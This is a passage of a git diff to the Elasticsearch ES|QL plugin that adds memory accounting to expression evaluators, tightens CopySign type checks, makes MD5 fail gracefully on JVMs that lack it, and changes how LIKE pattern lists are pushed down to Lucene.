longBlock.getFirstValueIndex(p); - int end = start + valueCount; - if (valueCount == 0) { - builder.appendNull(); - continue; - } - if (valueCount == 1) { - double current = EsqlDataTypeConverter.unsignedLongToDouble(longBlock.getLong(p)); - builder.min().appendDouble(current); - builder.max().appendDouble(current); - builder.sum().appendDouble(current); - builder.count().appendInt(valueCount); - continue; - } - double min = Double.POSITIVE_INFINITY; - double max = Double.NEGATIVE_INFINITY; - for (int i = start; i < end; i++) { - double current = EsqlDataTypeConverter.unsignedLongToDouble(longBlock.getLong(p)); - min = Math.min(min, current); - max = Math.max(max, current); - sum.add(current); - } - builder.min().appendDouble(min); - builder.max().appendDouble(max); - builder.sum().appendDouble(sum.value()); - builder.count().appendInt(valueCount); - sum.reset(0, 0); - } - return builder.build(); - } - } + return new UnsignedLong(context.blockFactory(), fieldEvaluator.get(context)); + } + } - private Block evalVector(Vector vector) { - int positionCount = vector.getPositionCount(); - LongVector longVector = (LongVector) vector; - try ( - AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder( - positionCount, - context.blockFactory() - ) - ) { - for (int p = 0; p < positionCount; p++) { - double value = EsqlDataTypeConverter.unsignedLongToDouble(longVector.getLong(p)); - builder.appendValue(value); - } - return builder.build(); + public record UnsignedLong(BlockFactory blockFactory, EvalOperator.ExpressionEvaluator eval) + implements + EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(UnsignedLong.class); + + private Block evalBlock(Block block) { + int positionCount = block.getPositionCount(); + LongBlock longBlock = (LongBlock) block; + try (AggregateMetricDoubleBlockBuilder builder = blockFactory.newAggregateMetricDoubleBlockBuilder(positionCount)) { + CompensatedSum sum = new CompensatedSum(); + for (int p = 0; p < positionCount; p++) { + int valueCount = longBlock.getValueCount(p); + int start = longBlock.getFirstValueIndex(p); + int end = start + valueCount; + if (valueCount == 0) { + builder.appendNull(); + continue; } - } - - @Override - public Block eval(Page page) { - try (Block block = eval.eval(page)) { - Vector vector = block.asVector(); - return vector == null ? evalBlock(block) : evalVector(vector); + if (valueCount == 1) { + double current = EsqlDataTypeConverter.unsignedLongToDouble(longBlock.getLong(p)); + builder.min().appendDouble(current); + builder.max().appendDouble(current); + builder.sum().appendDouble(current); + builder.count().appendInt(valueCount); + continue; } + double min = Double.POSITIVE_INFINITY; + double max = Double.NEGATIVE_INFINITY; + for (int i = start; i < end; i++) { + double current = EsqlDataTypeConverter.unsignedLongToDouble(longBlock.getLong(p)); + min = Math.min(min, current); + max = Math.max(max, current); + sum.add(current); + } + builder.min().appendDouble(min); + builder.max().appendDouble(max); + builder.sum().appendDouble(sum.value()); + builder.count().appendInt(valueCount); + sum.reset(0, 0); } + return builder.build(); + } + } - @Override - public void close() { - Releasables.closeExpectNoException(eval); + private Block evalVector(Vector vector) { + int positionCount = vector.getPositionCount(); + LongVector longVector = (LongVector) vector; + try (AggregateMetricDoubleVectorBuilder builder = new AggregateMetricDoubleVectorBuilder(positionCount, blockFactory)) { + for (int p = 0; p < positionCount; p++) { + double value = EsqlDataTypeConverter.unsignedLongToDouble(longVector.getLong(p)); + builder.appendValue(value); } + return builder.build(); + } + } - @Override - public String toString() { - return "ToAggregateMetricDoubleFromUnsignedLongEvaluator[field=" + eval + "]"; - } - }; + @Override + public Block eval(Page page) { + try (Block block = eval.eval(page)) { + Vector vector = block.asVector(); + return vector == null ? evalBlock(block) : evalVector(vector); + } + } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + eval.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.closeExpectNoException(eval); + } + + @Override + public String toString() { + return "ToAggregateMetricDoubleFromUnsignedLongEvaluator[field=" + eval + "]"; } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromAggregateMetricDoubleEvaluator.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromAggregateMetricDoubleEvaluator.java index e67ba29ab0227..2d8ffbd34b649 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromAggregateMetricDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromAggregateMetricDoubleEvaluator.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.convert; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.AggregateMetricDoubleBlock; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; @@ -20,6 +21,10 @@ import static org.elasticsearch.xpack.esql.type.EsqlDataTypeConverter.aggregateMetricDoubleBlockToString; public class ToStringFromAggregateMetricDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance( + ToStringFromAggregateMetricDoubleEvaluator.class + ); + private final EvalOperator.ExpressionEvaluator field; public ToStringFromAggregateMetricDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { @@ -62,6 +67,11 @@ public String toString() { return "ToStringFromAggregateMetricDoubleEvaluator[field=" + field + ']'; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + @Override public void close() { Releasables.closeExpectNoException(field); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTrunc.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTrunc.java index 6981c8e3b9d82..fc59d3471863c 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTrunc.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateTrunc.java @@ -67,8 +67,9 @@ public interface DateTruncFactoryProvider { examples = { @Example(file = "date", tag = "docsDateTrunc"), @Example( - description = "Combine `DATE_TRUNC` with <> to create date histograms. For\n" - + "example, the number of hires per year:", + description = "Combine `DATE_TRUNC` with [`STATS`](/reference/query-languages/esql/commands/stats-by.md) " + + "to create date histograms. " + + "For example, the number of hires per year:", file = "date", tag = "docsDateTruncHistogram" ), diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySign.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySign.java index 884c67c38a3f9..83eb43627aa99 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySign.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySign.java @@ -15,6 +15,7 @@ import org.elasticsearch.xpack.esql.EsqlIllegalArgumentException; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.Expressions; +import org.elasticsearch.xpack.esql.core.expression.TypeResolutions; import org.elasticsearch.xpack.esql.core.tree.NodeInfo; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; @@ -60,21 +61,20 @@ EvalOperator.ExpressionEvaluator.Factory create( private DataType dataType; - @FunctionInfo( - description = "Returns a value with the magnitude of the first argument and the sign of the second argument. " - + "This function is similar to Java's Math.copySign(double magnitude, double sign).", - returnType = { "double", "float" } - ) + @FunctionInfo(description = """ + Returns a value with the magnitude of the first argument and the sign of the second argument. + This function is similar to Java's Math.copySign(double magnitude, double sign) which is + similar to `copysign` from [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754).""", returnType = { "double", "integer", "long" }) public CopySign( Source source, @Param( name = "magnitude", - type = { "double", "float", "integer", "long" }, + type = { "double", "integer", "long" }, description = "The expression providing the magnitude of the result. Must be a numeric type." ) Expression magnitude, @Param( name = "sign", - type = { "double", "float", "integer", "long" }, + type = { "double", "integer", "long" }, description = "The expression providing the sign of the result. Must be a numeric type." ) Expression sign ) { @@ -125,11 +125,25 @@ public TypeResolution resolveType() { } var magnitude = children().get(0); var sign = children().get(1); - if (magnitude.dataType().isNumeric() == false) { - return new TypeResolution("Magnitude must be a numeric type"); + TypeResolution resolution = TypeResolutions.isType( + magnitude, + t -> t.isNumeric() && t != DataType.UNSIGNED_LONG, + sourceText(), + TypeResolutions.ParamOrdinal.FIRST, + "numeric" + ); + if (resolution.unresolved()) { + return resolution; } - if (sign.dataType().isNumeric() == false) { - return new TypeResolution("Sign must be a numeric type"); + resolution = TypeResolutions.isType( + sign, + t -> t.isNumeric() && t != DataType.UNSIGNED_LONG, + sourceText(), + TypeResolutions.ParamOrdinal.SECOND, + "numeric" + ); + if (resolution.unresolved()) { + return resolution; } // The return type is the same as the magnitude type, so we can use it directly. dataType = magnitude.dataType(); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/Scalb.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/Scalb.java index b23b2323d0498..ff07e1c71a4c6 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/Scalb.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/Scalb.java @@ -20,6 +20,8 @@ import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.core.util.NumericUtils; import org.elasticsearch.xpack.esql.expression.function.Example; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesTo; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesToLifecycle; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.Param; import org.elasticsearch.xpack.esql.expression.function.scalar.EsqlScalarFunction; @@ -40,11 +42,16 @@ public class Scalb extends EsqlScalarFunction { private final Expression d; private final Expression scaleFactor; - @FunctionInfo(returnType = "double", description = """ - Returns the result of `d * 2 ^ scaleFactor`, - Similar to Java's `scalb` function. Result is rounded as if - performed by a single correctly rounded floating-point multiply - to a member of the double value set.""", examples = @Example(file = "floats", tag = "scalb")) + @FunctionInfo( + returnType = "double", + description = """ + Returns the result of `d * 2 ^ scaleFactor`, + Similar to Java's `scalb` function. Result is rounded as if + performed by a single correctly rounded floating-point multiply + to a member of the double value set.""", + examples = @Example(file = "floats", tag = "scalb"), + appliesTo = { @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1.0") } + ) public Scalb( Source source, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvConcat.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvConcat.java index cae366ed7d08d..293cc369ecfa7 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvConcat.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvConcat.java @@ -9,6 +9,7 @@ import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.BytesRefBuilder; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.compute.data.Block; @@ -16,6 +17,7 @@ import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.EvalOperator.ExpressionEvaluator; +import org.elasticsearch.core.Releasables; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FoldContext; import org.elasticsearch.xpack.esql.core.expression.TypeResolutions; @@ -131,6 +133,7 @@ public String toString() { * */ private static class Evaluator implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); private final DriverContext context; private final ExpressionEvaluator field; private final ExpressionEvaluator delim; @@ -185,6 +188,13 @@ public final String toString() { } @Override - public void close() {} + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed() + delim.baseRamBytesUsed(); + } + + @Override + public void close() { + Releasables.close(field, delim); + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvCount.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvCount.java index f36d121ef104f..2ef9b80e08a27 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvCount.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvCount.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.multivalue; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.compute.data.Block; @@ -110,6 +111,8 @@ public String toString() { } private static class Evaluator extends AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); + protected Evaluator(DriverContext driverContext, EvalOperator.ExpressionEvaluator field) { super(driverContext, field); } @@ -153,5 +156,10 @@ protected Block evalSingleValuedNullable(Block ref) { protected Block evalSingleValuedNotNullable(Block ref) { return driverContext.blockFactory().newConstantIntBlockWith(1, ref.getPositionCount()); } + + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSort.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSort.java index 4653b5f74dc40..e2e481b84f4f4 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSort.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSort.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.multivalue; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.common.TriFunction; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; @@ -289,6 +290,8 @@ public String toString() { } private static class Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); + private final BlockFactory blockFactory; private final EvalOperator.ExpressionEvaluator field; private final boolean order; @@ -322,6 +325,13 @@ public String toString() { } @Override - public void close() {} + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + + @Override + public void close() { + field.close(); + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/X-CoalesceEvaluator.java.st b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/X-CoalesceEvaluator.java.st index 83a32ad6d0f2b..5eec0ab6903ad 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/X-CoalesceEvaluator.java.st +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/X-CoalesceEvaluator.java.st @@ -11,6 +11,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.nulls; $if(BytesRef)$ import org.apache.lucene.util.BytesRef; $endif$ +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.$Type$Block; import org.elasticsearch.compute.data.Page; @@ -28,12 +29,14 @@ import java.util.stream.IntStream; /** * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}. - * This class is generated. Edit {@code X-InEvaluator.java.st} instead. + * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead. */ abstract sealed class Coalesce$Type$Evaluator implements EvalOperator.ExpressionEvaluator permits Coalesce$Type$Evaluator.Coalesce$Type$EagerEvaluator, // Coalesce$Type$Evaluator.Coalesce$Type$LazyEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Coalesce$Type$Evaluator.class); + static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List children) { List childEvaluators = children.stream().map(toEvaluator::apply).toList(); if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) { @@ -133,6 +136,15 @@ abstract sealed class Coalesce$Type$Evaluator implements EvalOperator.Expression return getClass().getSimpleName() + "[values=" + evaluators + ']'; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ExpressionEvaluator e : evaluators) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public final void close() { Releasables.closeExpectNoException(() -> Releasables.close(evaluators)); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWith.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWith.java index 52dedcb670372..5a165d7c822a0 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWith.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWith.java @@ -151,7 +151,7 @@ public Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHand // TODO: Get the real FoldContext here var wildcardQuery = "*" + QueryParser.escape(BytesRefs.toString(suffix.fold(FoldContext.small()))); - return new WildcardQuery(source(), fieldName, wildcardQuery); + return new WildcardQuery(source(), fieldName, wildcardQuery, false, false); } @Override diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Hash.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Hash.java index be0a7b2fe27b2..c95e229b04419 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Hash.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Hash.java @@ -11,6 +11,7 @@ import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.common.util.Result; import org.elasticsearch.compute.ann.Evaluator; import org.elasticsearch.compute.ann.Fixed; import org.elasticsearch.compute.operator.BreakingBytesRefBuilder; @@ -202,6 +203,14 @@ public static HashFunction create(BytesRef literal) throws NoSuchAlgorithmExcept return new HashFunction(algorithm, MessageDigest.getInstance(algorithm)); } + public static Result tryCreate(String algorithm) { + try { + return Result.of(new HashFunction(algorithm, MessageDigest.getInstance(algorithm))); + } catch (NoSuchAlgorithmException e) { + return Result.failure(e); + } + } + public HashFunction copy() { try { return new HashFunction(algorithm, MessageDigest.getInstance(algorithm)); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Md5.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Md5.java index b42ec1036cb5b..4d30f6b1b37f4 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Md5.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/Md5.java @@ -9,6 +9,8 @@ import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.util.Result; +import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.tree.NodeInfo; import org.elasticsearch.xpack.esql.core.tree.Source; @@ -18,17 +20,24 @@ import org.elasticsearch.xpack.esql.expression.function.scalar.string.Hash.HashFunction; import java.io.IOException; +import java.security.MessageDigest; +import java.security.NoSuchAlgorithmException; import java.util.List; public class Md5 extends AbstractHashFunction { public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry(Expression.class, "MD5", Md5::new); - private static final HashFunction MD5 = HashFunction.create("MD5"); + /** + * As of Java 14, it is permissible for a JRE to ship without the {@code MD5} {@link MessageDigest}. + * We want the "md5" function in ES|QL to fail at runtime on such platforms (rather than at startup) + * so we wrap the {@link HashFunction} in a {@link Result}. + */ + private static final Result MD5 = HashFunction.tryCreate("MD5"); @FunctionInfo( returnType = "keyword", - description = "Computes the MD5 hash of the input.", + description = "Computes the MD5 hash of the input (if the MD5 hash is available on the JVM).", examples = { @Example(file = "hash", tag = "md5") } ) public Md5(Source source, @Param(name = "input", type = { "keyword", "text" }, description = "Input to hash.") Expression input) { @@ -41,7 +50,12 @@ private Md5(StreamInput in) throws IOException { @Override protected HashFunction getHashFunction() { - return MD5; + try { + return MD5.get(); + } catch (NoSuchAlgorithmException e) { + // Throw a new exception so that the stack trace reflects this call (rather than the static initializer for the MD5 field) + throw new VerificationException("function 'md5' is not available on this platform: {}", e.getMessage()); + } } @Override diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWith.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWith.java index f457bacf44268..3dc43e29f3fa9 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWith.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWith.java @@ -148,7 +148,7 @@ public Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHand // TODO: Get the real FoldContext here var wildcardQuery = QueryParser.escape(BytesRefs.toString(prefix.fold(FoldContext.small()))) + "*"; - return new WildcardQuery(source(), fieldName, wildcardQuery); + return new WildcardQuery(source(), fieldName, wildcardQuery, false, false); } @Override diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLike.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLike.java index d7d1973fceda1..da7eb6d07c61e 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLike.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLike.java @@ -38,8 +38,7 @@ public class WildcardLike extends RegexMatch { Use `LIKE` to filter data based on string patterns using wildcards. `LIKE` usually acts on a field placed on the left-hand side of the operator, but it can also act on a constant (literal) expression. The right-hand side of the operator - represents the pattern or a list of patterns. If a list of patterns is provided, - the expression will return true if any of the patterns match. + represents the pattern. The following wildcard characters are supported: @@ -51,11 +50,19 @@ also act on a constant (literal) expression. The right-hand side of the operator <> - <> - To reduce the overhead of escaping, we suggest using triple quotes strings `\"\"\"` <> + + ```{applies_to} + stack: ga 9.1 + serverless: ga + ``` + Both a single pattern or a list of patterns are supported. If a list of patterns is provided, + the expression will return true if any of the patterns match. + + <> + """, operator = NAME, examples = @Example(file = "docs", tag = "like")) public WildcardLike( Source source, @@ -115,11 +122,14 @@ public Translatable translatable(LucenePushdownPredicates pushdownPredicates) { public Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHandler handler) { var field = field(); LucenePushdownPredicates.checkIsPushableAttribute(field); - return translateField(handler.nameOf(field instanceof FieldAttribute fa ? fa.exactAttribute() : field)); + return translateField( + handler.nameOf(field instanceof FieldAttribute fa ? fa.exactAttribute() : field), + pushdownPredicates.flags().stringLikeOnIndex() + ); } // TODO: see whether escaping is needed - private Query translateField(String targetFieldName) { - return new WildcardQuery(source(), targetFieldName, pattern().asLuceneWildcard(), caseInsensitive()); + private Query translateField(String targetFieldName, boolean forceStringMatch) { + return new WildcardQuery(source(), targetFieldName, pattern().asLuceneWildcard(), caseInsensitive(), forceStringMatch); } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLikeList.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLikeList.java index 0b58594779408..d38e315b58b4f 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLikeList.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/regex/WildcardLikeList.java @@ -7,26 +7,35 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.string.regex; +import org.apache.lucene.search.MultiTermQuery.RewriteMethod; +import org.apache.lucene.util.automaton.Automaton; +import org.apache.lucene.util.automaton.CharacterRunAutomaton; +import org.elasticsearch.TransportVersion; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.index.mapper.MappedFieldType; +import org.elasticsearch.index.query.SearchExecutionContext; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; import org.elasticsearch.xpack.esql.core.expression.predicate.regex.WildcardPattern; import org.elasticsearch.xpack.esql.core.expression.predicate.regex.WildcardPatternList; -import org.elasticsearch.xpack.esql.core.querydsl.query.AutomatonQuery; import org.elasticsearch.xpack.esql.core.querydsl.query.Query; import org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; import org.elasticsearch.xpack.esql.core.tree.NodeInfo; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.expression.function.Param; +import org.elasticsearch.xpack.esql.io.stream.ExpressionQuery; import org.elasticsearch.xpack.esql.io.stream.PlanStreamInput; import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import java.io.IOException; +import java.util.function.Supplier; import java.util.stream.Collectors; +import static org.elasticsearch.index.query.WildcardQueryBuilder.expressionTransportSupported; + public class WildcardLikeList extends RegexMatch { public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( Expression.class, @@ -34,6 +43,30 @@ public class WildcardLikeList extends RegexMatch { WildcardLikeList::new ); + Supplier automatonSupplier = new Supplier<>() { + Automaton cached; + + @Override + public Automaton get() { + if (cached == null) { + cached = pattern().createAutomaton(caseInsensitive()); + } + return cached; + } + }; + + Supplier characterRunAutomatonSupplier = new Supplier<>() { + CharacterRunAutomaton cached; + + @Override + public CharacterRunAutomaton get() { + if (cached == null) { + cached = new CharacterRunAutomaton(automatonSupplier.get()); + } + return cached; + } + }; + /** * The documentation for this function is in WildcardLike, and shown to the users `LIKE` in the docs. */ @@ -92,8 +125,12 @@ protected WildcardLikeList replaceChild(Expression newLeft) { */ @Override public Translatable translatable(LucenePushdownPredicates pushdownPredicates) { - return pushdownPredicates.isPushableAttribute(field()) ? Translatable.YES : Translatable.NO; - + if (supportsPushdown(pushdownPredicates.minTransportVersion())) { + return pushdownPredicates.isPushableAttribute(field()) ? Translatable.YES : Translatable.NO; + } else { + // The ExpressionQuery we use isn't serializable to all nodes in the cluster. + return Translatable.NO; + } } /** @@ -104,20 +141,40 @@ public Translatable translatable(LucenePushdownPredicates pushdownPredicates) { public Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHandler handler) { var field = field(); LucenePushdownPredicates.checkIsPushableAttribute(field); - return translateField(handler.nameOf(field instanceof FieldAttribute fa ? fa.exactAttribute() : field)); + String targetFieldName = handler.nameOf(field instanceof FieldAttribute fa ? fa.exactAttribute() : field); + return translateField(targetFieldName); } - /** - * Translates the field to a {@link WildcardQuery} using the first pattern in the list. - * Throws an {@link IllegalArgumentException} if the pattern list contains more than one pattern. - */ - private Query translateField(String targetFieldName) { - return new AutomatonQuery(source(), targetFieldName, pattern().createAutomaton(caseInsensitive()), getAutomatonDescription()); + private boolean supportsPushdown(TransportVersion version) { + return version == null || expressionTransportSupported(version); + } + + @Override + public org.apache.lucene.search.Query asLuceneQuery( + MappedFieldType fieldType, + RewriteMethod constantScoreRewrite, + SearchExecutionContext context + ) { + return fieldType.automatonQuery( + automatonSupplier, + characterRunAutomatonSupplier, + constantScoreRewrite, + context, + getLuceneQueryDescription() + ); } - private String getAutomatonDescription() { + private String getLuceneQueryDescription() { // we use the information used to create the automaton to describe the query here String patternDesc = pattern().patternList().stream().map(WildcardPattern::pattern).collect(Collectors.joining("\", \"")); return "LIKE(\"" + patternDesc + "\"), caseInsensitive=" + caseInsensitive(); } + + /** + * Translates the field to a {@link WildcardQuery} using the first pattern in the list. + * Throws an {@link IllegalArgumentException} if the pattern list contains more than one pattern. + */ + private Query translateField(String targetFieldName) { + return new ExpressionQuery(source(), targetFieldName, this); + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/util/Delay.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/util/Delay.java index 182f221a70f75..8f7ac9373b6e5 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/scalar/util/Delay.java +++ 